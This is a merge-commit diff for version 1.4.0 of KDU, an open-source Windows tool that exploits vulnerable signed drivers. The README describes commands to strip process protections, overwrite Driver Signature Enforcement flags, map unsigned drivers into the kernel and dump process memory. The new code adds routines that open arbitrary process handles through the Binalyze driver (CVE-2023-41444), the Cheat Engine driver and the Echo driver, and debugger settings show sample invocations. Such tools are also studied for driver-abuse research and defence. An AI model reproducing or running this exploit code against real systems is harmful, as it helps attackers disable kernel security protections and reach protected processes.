Merge pull request #81 from hfiref0x/dev140

v 1.4.0
hfiref0x · Oct 23, 2023 · 39bc98a · 39bc98a
2 parents 448585f + 97e6f8d
commit 39bc98a
Show file tree

Hide file tree

Showing 85 changed files with 894 additions and 526 deletions.
diff --git a/README.md b/README.md
@@ -24,13 +24,15 @@ It features:
 ###### KDU -prv ProviderID
 ###### KDU -ps ProcessID
 ###### KDU -pse Commandline
+###### KDU -dmp ProcessID
 ###### KDU -dse value
 ###### KDU -map filename
 * -list - list currently available providers;
 * -diag - run system diagnostic for troubleshooting;
 * -prv  - optional, select vulnerability driver provider;
 * -ps   - modify process object of given ProcessID, downgrading any protections;
 * -pse  - launch program as ProtectedProcessLight-AntiMalware (PPL);
+* -dmp  - dump virtual memory of the given process;
 * -dse  - write user defined value to the system DSE state flags;
 * -map  - map driver to the kernel and execute it entry point, this command have dependencies listed below;
   * -scv version - optional, select shellcode version, default 1;
@@ -145,6 +147,9 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
 | 38          | Pavel Yosifovich | KRegExp  | Kernel Registry Explorer        | Original          | Undefined              |                      |
 | 39          | Inspect Element LTD | EchoDrv  | Echo AntiCheat (spyware)     | Original          | Undefined              |                      |
 | 40          | NVidia | nvoclock  | NVidia System Utility Driver     | Original          | 7.0.0.32              |                      |
+| 41          | Binalyze | IREC  | Binalyze DFIR     | Original          | 3.11.0              |                      |
+| 42          | DavidXXW | PhyDMACC  | SLIC ToolKit     | WINRING0          | 1.2.0              |                      |
+| 43          | Razer | rzpnk  | Razer Synapse     | Original          |  2.20.15.1104              |                      |
 
 ###### *At commit time, data maybe inaccurate.
 
@@ -212,6 +217,7 @@ Using this program might crash your computer with BSOD. Compiled binary and sour
 * LOLDrivers, https://www.loldrivers.io
 * ECHOH NO, https://github.com/kite03/echoac-poc/
 * NVDrv, https://github.com/zer0condition/NVDrv
+* CVE-2023-41444, https://blog.dru1d.ninja/windows-driver-exploit-development-irec-sys-a5eb45093945
 
 # Wormhole drivers code
 

diff --git a/Source/Hamakaze/KDU.vcxproj b/Source/Hamakaze/KDU.vcxproj
@@ -138,6 +138,7 @@
     <ClCompile Include="idrv\alcpu.cpp" />
     <ClCompile Include="idrv\asrdrv.cpp" />
     <ClCompile Include="idrv\atszio.cpp" />
+    <ClCompile Include="idrv\binalyze.cpp" />
     <ClCompile Include="idrv\dbk.cpp" />
     <ClCompile Include="idrv\dell.cpp" />
     <ClCompile Include="idrv\directio64.cpp" />
@@ -155,6 +156,7 @@
     <ClCompile Include="idrv\phymem.cpp" />
     <ClCompile Include="idrv\procexp.cpp" />
     <ClCompile Include="idrv\ryzen.cpp" />
+    <ClCompile Include="idrv\rzpnk.cpp" />
     <ClCompile Include="idrv\winio.cpp" />
     <ClCompile Include="idrv\nal.cpp" />
     <ClCompile Include="idrv\rtcore.cpp" />
@@ -197,6 +199,7 @@
     <ClInclude Include="idrv\alcpu.h" />
     <ClInclude Include="idrv\asrdrv.h" />
     <ClInclude Include="idrv\atszio.h" />
+    <ClInclude Include="idrv\binalyze.h" />
     <ClInclude Include="idrv\dbk.h" />
     <ClInclude Include="idrv\echodrv.h" />
     <ClInclude Include="idrv\hilscher.h" />
@@ -215,6 +218,7 @@
     <ClInclude Include="idrv\phymem.h" />
     <ClInclude Include="idrv\procexp.h" />
     <ClInclude Include="idrv\ryzen.h" />
+    <ClInclude Include="idrv\rzpnk.h" />
     <ClInclude Include="idrv\winio.h" />
     <ClInclude Include="idrv\nal.h" />
     <ClInclude Include="idrv\rtcore.h" />

diff --git a/Source/Hamakaze/KDU.vcxproj.filters b/Source/Hamakaze/KDU.vcxproj.filters
@@ -213,6 +213,12 @@
     <ClCompile Include="idrv\nvidia.cpp">
       <Filter>Source Files\idrv</Filter>
     </ClCompile>
+    <ClCompile Include="idrv\binalyze.cpp">
+      <Filter>Source Files\idrv</Filter>
+    </ClCompile>
+    <ClCompile Include="idrv\rzpnk.cpp">
+      <Filter>Source Files\idrv</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="global.h">
@@ -398,6 +404,12 @@
     <ClInclude Include="idrv\nvidia.h">
       <Filter>Source Files\idrv</Filter>
     </ClInclude>
+    <ClInclude Include="idrv\binalyze.h">
+      <Filter>Source Files\idrv</Filter>
+    </ClInclude>
+    <ClInclude Include="idrv\rzpnk.h">
+      <Filter>Source Files\idrv</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ResourceCompile Include="resource.rc">

diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,11 +1,11 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LocalDebuggerCommandArguments>-test</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-prv 43 -dmp 440</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LocalDebuggerCommandArguments>-prv 40 -dse 6</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-prv 42 -map c:\install\dummy2.sys</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>
diff --git a/Source/Hamakaze/idrv/binalyze.cpp b/Source/Hamakaze/idrv/binalyze.cpp
@@ -0,0 +1,56 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2023
+*
+*  TITLE:       BINALYZE.CPP
+*
+*  VERSION:     1.40
+*
+*  DATE:        20 Oct 2023
+*
+*  Binalyze driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/binalyze.h"
+
+//
+// Based on CVE-2023-41444
+//
+
+/*
+* BeDrvOpenProcess
+*
+* Purpose:
+*
+* Open process via Binalyze driver.
+*
+*/
+BOOL WINAPI BeDrvOpenProcess(
+    _In_ HANDLE DeviceHandle,
+    _In_ HANDLE ProcessId,
+    _In_ ACCESS_MASK DesiredAccess,
+    _Out_ PHANDLE ProcessHandle)
+{
+    UNREFERENCED_PARAMETER(DesiredAccess);
+
+    BOOL bResult = FALSE;
+    DWORD data = HandleToUlong(ProcessId);
+
+    bResult = supCallDriver(DeviceHandle,
+        IOCTL_IREC_OPEN_PROCESS,
+        &data,
+        sizeof(data),
+        &data,
+        sizeof(data));
+
+    *ProcessHandle = UlongToHandle(data);
+
+    return bResult;
+}
diff --git a/Source/Hamakaze/idrv/binalyze.h b/Source/Hamakaze/idrv/binalyze.h
@@ -0,0 +1,32 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2023
+*
+*  TITLE:       BINALYZE.H
+*
+*  VERSION:     1.40
+*
+*  DATE:        20 Oct 2023
+*
+*  Binalyze driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+#define IREC_DEVICE_TYPE            (DWORD)0x8001
+#define IREC_FUNCTION_OPEN_PROCESS  (DWORD)0x80A
+
+#define IOCTL_IREC_OPEN_PROCESS      \
+    CTL_CODE(IREC_DEVICE_TYPE, IREC_FUNCTION_OPEN_PROCESS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x80012028
+
+BOOL WINAPI BeDrvOpenProcess(
+    _In_ HANDLE DeviceHandle,
+    _In_ HANDLE ProcessId,
+    _In_ ACCESS_MASK DesiredAccess,
+    _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/dbk.cpp b/Source/Hamakaze/idrv/dbk.cpp
@@ -4,9 +4,9 @@
 *
 *  TITLE:       DBK.CPP
 *
-*  VERSION:     1.32
+*  VERSION:     1.40
 *
-*  DATE:        10 Jun 2023
+*  DATE:        20 Oct 2023
 *
 *  Cheat Engine's DBK driver routines.
 *
@@ -651,3 +651,36 @@ BOOL DbkControlDSE(
 
     return bResult;
 }
+
+/*
+* DbkOpenProcess
+*
+* Purpose:
+*
+* Open process via CheatEngine driver.
+*
+*/
+BOOL WINAPI DbkOpenProcess(
+    _In_ HANDLE DeviceHandle,
+    _In_ HANDLE ProcessId,
+    _In_ ACCESS_MASK DesiredAccess,
+    _Out_ PHANDLE ProcessHandle)
+{
+    UNREFERENCED_PARAMETER(DesiredAccess);
+
+    struct {
+        HANDLE ProcessHandle;
+        BYTE Special;
+    } outputBuffer = { NULL, 0 };
+
+    BOOL bResult = supCallDriver(DeviceHandle,
+        IOCTL_CE_OPENPROCESS,
+        &ProcessId,
+        sizeof(DWORD),
+        &outputBuffer,
+        sizeof(outputBuffer));
+
+    *ProcessHandle = outputBuffer.ProcessHandle;
+
+    return bResult;
+}
diff --git a/Source/Hamakaze/idrv/dbk.h b/Source/Hamakaze/idrv/dbk.h
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2022
+*  (C) COPYRIGHT AUTHORS, 2022 - 2023
 *
 *  TITLE:       DBK.H
 *
-*  VERSION:     1.20
+*  VERSION:     1.40
 *
-*  DATE:        14 Feb 2022
+*  DATE:        20 Oct 2023
 *
 *  Cheat Engine's DBK driver interface header.
 *
@@ -25,6 +25,7 @@
 
 #define DBK_DEVICE_TYPE (DWORD)FILE_DEVICE_UNKNOWN
 
+#define DBK_FUNC_OPEN_PROCESS (DWORD)0x0802
 #define DBK_FUNC_ALLOCATEMEM_NONPAGED (DWORD)0x0826
 #define DBK_FUNC_FREEMEM (DWORD)0x084C
 #define DBK_FUNC_MAP_MEMORY (DWORD)0x084D
@@ -46,6 +47,10 @@
 #define IOCTL_CE_EXECUTE_CODE    \
     CTL_CODE(DBK_DEVICE_TYPE, DBK_FUNC_EXECUTE_CODE, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
 
+#define IOCTL_CE_OPENPROCESS     \
+    CTL_CODE(DBK_DEVICE_TYPE, DBK_FUNC_OPEN_PROCESS, METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+
+
 BOOL DbkStartVulnerableDriver(
     _In_ KDU_CONTEXT* Context);
 
@@ -57,3 +62,9 @@ BOOL DbkControlDSE(
     _In_ PKDU_CONTEXT Context,
     _In_ ULONG DSEValue,
     _In_ ULONG_PTR Address);
+
+BOOL WINAPI DbkOpenProcess(
+    _In_ HANDLE DeviceHandle,
+    _In_ HANDLE ProcessId,
+    _In_ ACCESS_MASK DesiredAccess,
+    _Out_ PHANDLE ProcessHandle);
diff --git a/Source/Hamakaze/idrv/echodrv.cpp b/Source/Hamakaze/idrv/echodrv.cpp
@@ -4,9 +4,9 @@
 *
 *  TITLE:       ECHODRV.CPP
 *
-*  VERSION:     1.33
+*  VERSION:     1.40
 *
-*  DATE:        16 Jul 2023
+*  DATE:        21 Oct 2023
 *
 *  Inspect Element LTD spyware (anticheat) driver interface.
 *
@@ -126,7 +126,7 @@ BOOL WINAPI EchoDrvRegisterDriver(
 
     BOOL bResult;
     ECHODRV_REGISTER regRequest;
-    ECHODRV_VALIDATE_PROCESS procRequest;
+    ECHODRV_OPENPROCESS_REQUEST procRequest;
 
     RtlSecureZeroMemory(&regRequest, sizeof(regRequest));
 
@@ -190,3 +190,37 @@ BOOL WINAPI EchoDrvUnregisterDriver(
 
     return TRUE;
 }
+
+/*
+* EchoDrvOpenProcess
+*
+* Purpose:
+*
+* Open process via Echo driver.
+*
+*/
+BOOL WINAPI EchoDrvOpenProcess(
+    _In_ HANDLE DeviceHandle,
+    _In_ HANDLE ProcessId,
+    _In_ ACCESS_MASK DesiredAccess,
+    _Out_ PHANDLE ProcessHandle)
+{
+    BOOL bResult = FALSE;
+    ECHODRV_OPENPROCESS_REQUEST procRequest;
+
+    RtlSecureZeroMemory(&procRequest, sizeof(procRequest));
+
+    procRequest.ProcessId = HandleToUlong(ProcessId);
+    procRequest.DesiredAccess = DesiredAccess;
+
+    bResult = supCallDriver(DeviceHandle,
+        IOCTL_ECHODRV_OPEN_PROCESS,
+        &procRequest,
+        sizeof(procRequest),
+        &procRequest,
+        sizeof(procRequest));
+
+    *ProcessHandle = procRequest.ProcessHandle;
+
+    return bResult;
+}
diff --git a/Source/Hamakaze/idrv/echodrv.h b/Source/Hamakaze/idrv/echodrv.h
@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2022
+*  (C) COPYRIGHT AUTHORS, 2023
 *
 *  TITLE:       ECHODRV.H
 *
-*  VERSION:     1.33
+*  VERSION:     1.40
 *
-*  DATE:        16 Jul 2023
+*  DATE:        21 Oct 2023
 *
 *  Inspect Element LTD spyware (anticheat) driver interface header.
 *
@@ -47,13 +47,13 @@ typedef struct _ECHODRV_REGISTER {
     _Out_ DWORD UniqCode; //0x1000 for call
 } ECHODRV_REGISTER, * PECHODRV_REGISTER;
 
-typedef struct _ECHODRV_VALIDATE_PROCESS {
+typedef struct _ECHODRV_OPENPROCESS_REQUEST {
     _In_ DWORD ProcessId;
     _In_ ACCESS_MASK DesiredAccess;
     _Out_ HANDLE ProcessHandle;
     _Out_ BOOL bSuccess;
     _Out_ DWORD UniqCode; //0x1001 for call
-} ECHODRV_VALIDATE_PROCESS, * PECHODRV_VALIDATE_PROCESS;
+} ECHODRV_OPENPROCESS_REQUEST, * PECHODRV_OPENPROCESS_REQUEST;
 
 typedef struct _ECHODRV_COPYVM_REQUEST {
     _In_ HANDLE ProcessHandle;
@@ -84,3 +84,9 @@ BOOL WINAPI EchoDrvWriteVirtualMemory(
     _In_ ULONG_PTR VirtualAddress,
     _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
     _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI EchoDrvOpenProcess(
+    _In_ HANDLE DeviceHandle,
+    _In_ HANDLE ProcessId,
+    _In_ ACCESS_MASK DesiredAccess,
+    _Out_ PHANDLE ProcessHandle);